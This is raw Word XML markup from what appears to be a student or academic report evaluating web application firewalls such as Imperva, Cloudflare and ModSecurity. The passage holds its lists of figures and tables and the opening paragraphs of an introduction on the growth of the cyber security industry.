            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="475A16DF" w14:textId="31681A37" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138531" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 13 - Cloudflare specials rule group default settings</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_Toc71138531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34</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="662C3A88" w14:textId="1B84F920" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138532" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 14 - Disabling cache on Imperva</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_Toc71138532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36</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49CE6539" w14:textId="178DF19B" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138533" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 15 - Disabling cache on Cloudflare</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_Toc71138533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36</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E0E122D" w14:textId="669F8D5A" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138534" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 16 - Load test settings on Catchpoint</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_Toc71138534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37</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CDC135A" w14:textId="6F595AFB" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138535" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 17 - Burp Suite intercept request</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_Toc71138535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40</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31DF36B8" w14:textId="07725CA7" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138536" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 18 - Burp Suite intruder</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_Toc71138536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40</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B42EE35" w14:textId="7D7ABB34" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138537" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 19 - Failed PHP code injection requests on Burp Suite</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_Toc71138537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41</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31B95E64" w14:textId="2CE16B44" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138538" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 20 - Burp Suite broken authentication via dictionary attack</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_Toc71138538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42</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F66F4D3" w14:textId="582F96C0" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138539" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 21 - ModSecurity audit log</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_Toc71138539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47</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BCB1BF8" w14:textId="710DCEFB" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138540" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 22 - Imperva error code 15</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_Toc71138540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48</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59FCC059" w14:textId="243E2B5F" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138541" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 23 - Imperva alert</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_Toc71138541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48</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="506C0C91" w14:textId="638B6B80" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138542" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 24 - Cloudflare error page</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_Toc71138542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49</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C2B08A4" w14:textId="27C975B6" w:rsidR="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138543" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 25 - Cloudflare alert</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_Toc71138543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50</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40C2F4A2" w14:textId="79F75FFB" w:rsidR="00DA1D03" w:rsidRDefault="00DA1D03" w:rsidP="00DA1D03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EA2FCD" w14:textId="77777777" w:rsidR="00086AB3" w:rsidRPr="00CB0281" w:rsidRDefault="00086AB3" w:rsidP="00086AB3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc71138465"/>
      <w:r>
        <w:t xml:space="preserve">List of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0281">
        <w:t>Tables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="76C1FA36" w14:textId="2D5A91CE" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00086AB3">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Table" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc71138544" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 1 - Performance test results, average in milliseconds (n = 200 requests)</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_Toc71138544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44</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AA8E986" w14:textId="1A9C27E8" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138545" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2 - Alerts/Usability metrics</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_Toc71138545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45</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D136F8E" w14:textId="5234C792" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138546" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 3 - Security test results</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_Toc71138546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50</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DAB6511" w14:textId="1D892EF6" w:rsidR="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138547" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 4 - Further exploitation results</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc71138547 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00755101">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C83F50F" w14:textId="735105C7" w:rsidR="00563AD7" w:rsidRPr="00DD2F93" w:rsidRDefault="00086AB3" w:rsidP="00086AB3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00563AD7" w:rsidRPr="00DA1D03">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_Toc71138466"/>
      <w:r w:rsidR="00DD2F93" w:rsidRPr="00DD2F93">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="000E2933" w:rsidRPr="00DD2F93">
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="5EAF9D90" w14:textId="1671E305" w:rsidR="00C977DA" w:rsidRDefault="00C10B75" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber security industry in general had grown </w:t>
      </w:r>
      <w:r w:rsidR="003E7314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exponentially over the last decade. One of many reasons for the rapid growth is due to the ever-increasing cases of cyber-attacks and breaches. People have come to realise that it is high time for cyber security to be taken seriously. The quote “prevention is better than cure” is especially true in the cyber space because when an organisation faces a breach, there is no cure to it</w:t>
      </w:r>
      <w:r w:rsidR="009E03CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – t</w:t>
      </w:r>
      <w:r w:rsidR="003E7314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">he data stolen </w:t>
      </w:r>
      <w:r w:rsidR="000A526C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>could never be undone. This has been proven countless of times through attacks, big or small, such as WannaCry and Capita</w:t>
      </w:r>
      <w:r w:rsidR="001B2B78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="000A526C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> One breaches.</w:t>
      </w:r>
      <w:r w:rsidR="001B2B78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The only thing that could be done next is to prevent another of such attacks. By then, the organisation might have already made more losses than they would have spent on</w:t>
      </w:r>
      <w:r w:rsidR="00120B77">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> cyber</w:t>
      </w:r>
      <w:r w:rsidR="001B2B78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> security products and solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA41AE6" w14:textId="2E222242" w:rsidR="008D25E9" w:rsidRDefault="008D25E9" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Due to this, the need </w:t>
      </w:r>
      <w:r w:rsidR="009E03CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> professional solutions increased. Governments around the globe are spending huge sums of money to fund the cyber security industry. As a result, more jobs were created, more start-ups in this space are set up and more tools are made available for the various types of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5AC2D4" w14:textId="68125570" w:rsidR="00334090" w:rsidRDefault="00334090" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Automation has also been increasing to try to fill the gaps that human resources cannot fill</w:t>
      </w:r>
      <w:r w:rsidR="00BE1FDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
